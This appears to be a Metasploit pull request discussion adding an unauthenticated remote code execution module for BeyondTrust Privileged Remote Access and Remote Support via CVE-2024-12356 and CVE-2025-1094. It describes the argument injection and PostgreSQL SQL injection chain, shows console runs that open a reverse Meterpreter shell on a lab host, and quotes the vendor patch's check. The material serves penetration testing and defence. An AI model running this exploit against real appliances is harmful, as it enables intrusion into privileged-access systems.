Exploit module for BeyondTrust Privileged Remote Access & Remote Support (CVE-2024-12356, CVE-2025-1094)

[sfewer-r7]

Overview

This pull request adds an unauthenticated RCE exploit module targeting BeyondTrust Privileged Remote Access & Remote Support, leveraging CVE-2024-12356 + CVE-2025-1094.

CVE-2024-12356 is an argument injection issue in the BeyondTrust code base, and CVE-2025-1094 is a SQL injection issue in the PostgreSQL code base (shipped as a component in the BeyondTrust appliance).

The exploit can either leverage CVE-2024-12356 and CVE-2025-1094 together, or solely leverage CVE-2025-1094 (this is the default) for RCE. Arbitrary code execution is achieved with the privileges of the current site user (i.e. not root).

For a full technical analysis of the vulnerabilities, please read our AttackerKB Rapid7 Analysis.

Example

msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[*] Sending stage (3045380 bytes) to 192.168.86.105
[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000

meterpreter > getuid
Server username: mytestcompany
meterpreter > sysinfo
Computer     : 192.168.86.105
OS           : Gentoo 2.14 (Linux 6.1.76-bt)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[sfewer-r7]

Adding a comment here to mention that this module relies on #19834 - to fix an issue with WebSockets, so dropping the module into an older version of the framework wont work, you need to run MSF that has the WebSocket bug fix in it (MSF 6.4.47 and above).

[sfewer-r7]

I added commit 6f1287d, to warn a user if the exploit detects the WebSocket connection having been closed unexpectedly, as this is a strong indication the target has the patch BT24-10-ONPREM1 applied. As we cannot detect a patched target by a version based check (as the patch does not update the products version number), this is a good way to help a user understand why exploitation may have failed.

For example, running against a patched target now gives this:

msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Detected version 24.1.2
[*] Using company name: mytestcompany
[!] WebSocket closed unexpectedly! This may indicate the patch BT24-10-ONPREM1 has been applied, and the target is no longer vulnerable.
[*] Exploit completed, but no session was created.

This works because the patch BT24-10-ONPREM1 will add the below regex to sanity check the malicious gskey, and then call exit 1, terminating the thin-scc-wrapper script early, in-turn tearing down the WebSocket connection.

+	elif [[ ! "$gskey" =~ ^[a-zA-Z0-9]{32}$ ]]; then
+		blog "bad session key given: [$gskey]"
+		exit 1
 	else

[msutovsky-r7]

Release Notes

The module exploits two bugs CVE-2024-12356 and CVE-2025-1094, an argument injection in BeyondTrust code base and SQL injection in PostgreSQL code base, respectively.